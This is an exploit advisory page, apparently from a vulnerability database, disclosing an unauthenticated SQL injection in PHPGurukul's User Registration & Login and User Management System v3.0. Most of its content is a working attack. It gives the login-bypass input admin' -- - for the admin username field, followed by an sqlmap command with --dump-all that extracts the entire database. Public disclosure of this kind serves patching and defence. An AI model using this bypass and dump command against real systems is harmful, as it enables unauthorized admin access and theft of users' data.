User Registration And Login And User Management System 3.0 SQL Injection

2023.08.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated) # Google Dork: NA # Date: 19/08/2023 # Exploit Author: Ashutosh Singh Umath # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: 3.0 # Tested on: Windows 11 # CVE : Requested Proof Of Concept: 1. Navigate to the admin login page. URL: http://192.168.1.5/loginsystem/admin/ 2. Enter "*admin' -- -*" in the admin username field and anything random in the password field. 3. Now you successfully logged in as admin. 4. To download all the data from the database, use the below commands. 4.1. Login to the admin portal and capture the request. 4.2. Copy the intercepted request in a file. 4.3. Now use the below command to dump all the data Command: sqlmap -r <file-name> -p username -D loginsystem --dump-all Thanks and Regards, Ashutosh Singh Umath


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top